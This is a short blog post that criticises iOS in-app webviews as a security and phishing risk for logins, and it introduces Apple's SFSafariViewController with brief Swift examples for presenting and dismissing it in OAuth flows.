Apple forcing developpers to use in-app browser instead of spawning Safari has been known as an extremely insecure practice for sometime. There many reasons that this was a bad practice both from security and usability point of view:
- An app developers can snatch user’s password
- No URL bar means user cannot have any visual cue for the right site
- Training users to be phishable
- Users are forced to input password everytime since the webview does not sync cookies etc. with Safari.
With the announcement of iOS 9, there seem to be an interesting feature introduced by Apple with this regard.
It is called SFSafariView Controller.
You can find some details here: http://www.hackingwithswift.com/ios9
According to it, it is being called like:
let sfc = SFSafariViewController(URL: NSURL(string: "http://www.slashdot.org")!) sfc.delegate = self presentViewController(sfc, animated: true, completion: nil)
Apparently, the user has an option of closing it with a click of the button “Done”, at which moment safariViewControllerDidFinish() is triggered.
func safariViewControllerDidFinish(controller: SFSafariViewController) {
controller.dismissViewControllerAnimated(true, completion: nil)
}
From the OAuth point of view, having the user click “Done” is sub-optimal. It should automatically happen. Also, it is not clear at this moment to me how to pass the server generated variables back to the app. It remains to be seen.